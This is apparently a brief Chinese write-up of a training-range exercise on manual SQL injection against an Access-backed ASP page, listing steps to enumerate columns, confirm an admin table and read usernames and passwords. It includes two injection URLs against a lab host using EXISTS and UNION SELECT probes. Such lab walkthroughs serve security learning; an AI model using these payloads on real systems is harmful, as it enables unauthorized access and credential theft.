04#墨者靶場-SQL手工注入漏洞測試(Access數據庫)

                                                              墨者靶場4

                                                             By/shy014

  1. 確定列數,爲4列

  1. 確定存在admin表

http://219.153.49.228:47368/new_list.asp?id=1 and exists (select * from admin)

  1. 確定回顯位置

http://219.153.49.228:47368/new_list.asp?id=1 union select 1,2,3,4 from admin

  1. 確定存在username字段和passwd字段

 

  1. 讀取用戶和密碼

  1. 解密並提交key

發表評論
所有評論
還沒有人評論,想成為第一個評論的人麼? 請在上方評論欄輸入並且點擊發布.
相關文章